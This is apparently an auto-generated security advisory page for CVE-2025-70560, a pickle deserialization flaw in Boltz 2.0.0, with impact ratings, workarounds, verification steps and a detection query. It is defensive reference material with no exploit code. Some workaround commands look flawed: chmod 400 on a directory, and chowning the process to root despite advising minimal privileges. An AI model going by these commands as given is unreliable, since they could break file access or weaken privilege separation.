CVE-2025-70560 – Boltz 2.0.0 contains a critical insecure deseri... (How to Fix)

Q: What is the severity of CVE-2025-70560?

CVE-2025-70560 has a CVSS score of 8.4 (HIGH). Boltz 2.0.0 contains a critical insecure deserialization vulnerability that allows arbitrary code execution when loading malicious pickle files. Attackers who can place crafted files in directories processed by boltz can achieve remote code execution. This affects all users of Boltz 2.0.0 who load molecule data files from untrusted sources.

📋 TL;DR

Boltz 2.0.0 contains a critical insecure deserialization vulnerability that allows arbitrary code execution when loading malicious pickle files. Attackers who can place crafted files in directories processed by boltz can achieve remote code execution. This affects all users of Boltz 2.0.0 who load molecule data files from untrusted sources.

💻 Affected Systems

Products:

Boltz

Versions: 2.0.0

Operating Systems: All platforms running Python

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in default configuration when loading molecule data files via pickle deserialization.

📦 What is this software?

Boltz by Jwohlwend

View all CVEs affecting Boltz →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining the same privileges as the boltz process, potentially leading to data theft, lateral movement, or persistence establishment.

🟠

Likely Case

Local privilege escalation or remote code execution if boltz processes files from network shares or user-uploaded directories.

🟢

If Mitigated

Limited impact if file access is restricted to trusted sources and boltz runs with minimal privileges.

🌐 Internet-Facing: MEDIUM - Risk exists if boltz web interfaces or APIs accept file uploads, but direct internet exposure is not typical for molecular modeling software.

🏢 Internal Only: HIGH - Internal users with file upload capabilities or access to shared directories can exploit this vulnerability.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires file placement capability; Python pickle exploits are well-documented and easy to weaponize.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: https://github.com/jwohlwend/boltz/issues/600

Restart Required: No

Instructions:

No official patch available. Monitor GitHub repository for updates and apply when released.

🔧 Temporary Workarounds

Disable pickle loading

all

Modify boltz source to replace pickle.load() with safe deserialization methods or disable molecule file loading functionality.

Edit src/boltz/data/mol.py line 80 to implement safe deserialization

Restrict file access

linux

Limit boltz to read-only access from trusted directories using filesystem permissions.

chmod 400 trusted_molecule_files/
chown root:root boltz_process

🧯 If You Can't Patch

Run boltz with minimal privileges (non-root user with restricted capabilities)
Implement strict input validation and only allow loading from whitelisted trusted file sources

🔍 How to Verify

Check if Vulnerable:

Check if using Boltz 2.0.0 and examine src/boltz/data/mol.py line 80 for pickle.load() usage without validation.

Check Version:

python -c "import boltz; print(boltz.__version__)"

Verify Fix Applied:

Verify pickle.load() has been replaced with safe deserialization or removed from the codebase.

📡 Detection & Monitoring

Log Indicators:

Unusual process spawns from boltz executable
File access errors to pickle files in unexpected locations

Network Indicators:

Unexpected outbound connections from boltz process

SIEM Query:

process_name:"python" AND parent_process_name:"boltz" AND cmdline:"pickle"

📊 Metadata

CVE ID: CVE-2025-70560

CVSS v3 Score: 8.4 (HIGH)

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-502

EPSS Score: 0.07% exploit probability (21th percentile)

Published: February 3, 2026

Last Updated: February 19, 2026

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-70560, you might also want to check these: